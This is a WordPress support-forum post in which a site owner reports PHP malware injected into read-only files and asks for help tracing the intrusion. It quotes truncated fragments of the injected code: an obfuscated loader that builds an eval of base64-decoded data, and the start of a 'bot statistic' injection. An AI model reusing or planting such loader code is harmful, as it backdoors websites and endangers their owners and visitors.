Title: Malware php code in read-only files
Last modified: August 20, 2016

---

# Malware php code in read-only files

 *  [learningmore](https://wordpress.org/support/users/learningmore/)
 * (@learningmore)
 * [14 years, 6 months ago](https://wordpress.org/support/topic/malware-php-code-in-read-only-files/)
 * All the php files have malware binary code inserted in the top of the file, but
   the files themselves are read-only. (Permission 444)
 * Here is an example:
    `<?php function qzacgowokc($wnv){$a30q='64';$gvea='$w';$
   zqe='o';$youp='nv';$y9n0='$w';$i3pz='ase';$otfu='ec';$dk5j='d';$kihc='=b';$ako7
   ='_';$x1i='de(';$jtkw=');';$vy='nv';eval($y9n0.$vy.$kihc.$i3pz.$a30q.$ako7.$dk5j.
   $otfu.$zqe.$x1i.$gvea.$youp.$jtkw);return $wnv;}$dhjwcu='NyJKCmNDIjdoQ2`
 * I previously was hacked with the “google bot statistic” malware. I commented 
   on it at the end of the thread here:
    [http://wordpress.org/support/topic/links-to-my-site-being-replaced-with-spam?replies=9](http://wordpress.org/support/topic/links-to-my-site-being-replaced-with-spam?replies=9)
   Here is an example:
 *     ```
       <?php
         // This code use for global bot statistic
         $sUserAgent = strtolower($_SE
       ```
   
 * I’ve changed passwords, checked permissions, re-updated to wordpress, changed
   the theme and still it seems they are getting in. I’ve discussed it with my host
   but they haven’t gotten back to me (GoDaddy).
 * Does anyone have any tips on tracking how it is happening? Someone mentioned 
   seeing ftp logs but Godaddy insists there isn’t ftp logs available.
 * Even if I go back to an old version of my site I think it will continue to happen.

The topic ‘Malware php code in read-only files’ is closed to new replies.

## Tags

 * [binary](https://wordpress.org/support/topic-tag/binary/)
 * [code](https://wordpress.org/support/topic-tag/code/)
 * [godaddy](https://wordpress.org/support/topic-tag/godaddy/)
 * [permissions](https://wordpress.org/support/topic-tag/permissions/)
 * [php](https://wordpress.org/support/topic-tag/php/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 0 replies
 * 1 participant
 * Last reply from: [learningmore](https://wordpress.org/support/users/learningmore/)
 * Last activity: [14 years, 6 months ago](https://wordpress.org/support/topic/malware-php-code-in-read-only-files/)
 * Status: not resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics